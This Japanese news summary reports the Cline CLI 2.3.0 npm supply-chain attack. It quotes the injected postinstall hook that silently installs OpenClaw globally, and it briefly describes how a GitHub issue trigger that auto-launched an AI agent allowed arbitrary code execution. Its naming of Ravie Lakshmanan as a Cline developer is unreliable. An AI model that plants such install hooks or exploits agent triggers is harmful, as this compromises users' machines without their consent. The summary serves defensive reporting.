概要
Cline CLIの開発者であるRavie Lakshmananは、2月20日、ソフトウェアサプライチェーン攻撃の一環として、オープンソースの人工知能(AI)コーディングアシスタントCline CLIが更新され、自己ホスト型自律AIエージェントであるOpenClawをインストールするスクリプトが追加されたことを報告しました。
攻撃の詳細
Cline CLI 2.3.0は、npmパッケージ管理システムで不正に公開されました。この更新では、package.jsonファイルに以下のスクリプトが追加されていました:
"postinstall": "npm install -g openclaw@latest"
これにより、Cline CLI 2.3.0をインストールすると自動的にOpenClawもインストールされるようになっています。
影響範囲
- 攻撃は2月17日午前3時26分から同日午前11時30分までの約8時間の間に発生しました。
- Cline CLI 2.3.0をインストールしたすべてのユーザーが影響を受けます。
- Visual Studio Code拡張機能やJetBrainsプラグインは影響を受けません。
対策とアップデート情報
Cline CLIの開発者は、この不正な公開を修正するためにバージョン2.4.0をリリースしました。また、npmパブリッシングメカニズムがGitHub Actions経由でOpenID Connect(OIDC)に対応するように更新されました。
攻撃の背景
この攻撃は、セキュリティ研究者のAdnan Khanによって発見されたGitHubの問題トリガー設定を悪用したものとされています。この設定により、新しいイシューが開かれた際に自動的にAIエージェント(Claude)が起動し、任意のコード実行が可能になりました。
今後の対策
Cline CLIの開発者は、この問題を修正するために以下の措置を講じています:
- npmパブリッシングメカニズムをGitHub Actions経由でOpenID Connect(OIDC)に対応させる。
- 不正な公開トークンの使用を停止し、新しいトークンを使用するように移行。
ユーザーは最新版に更新し、環境内にインストールされたOpenClawがないか確認することを推奨されています。
元記事: https://thehackernews.com/2026/02/cline-cli-230-supply-chain-attack.html
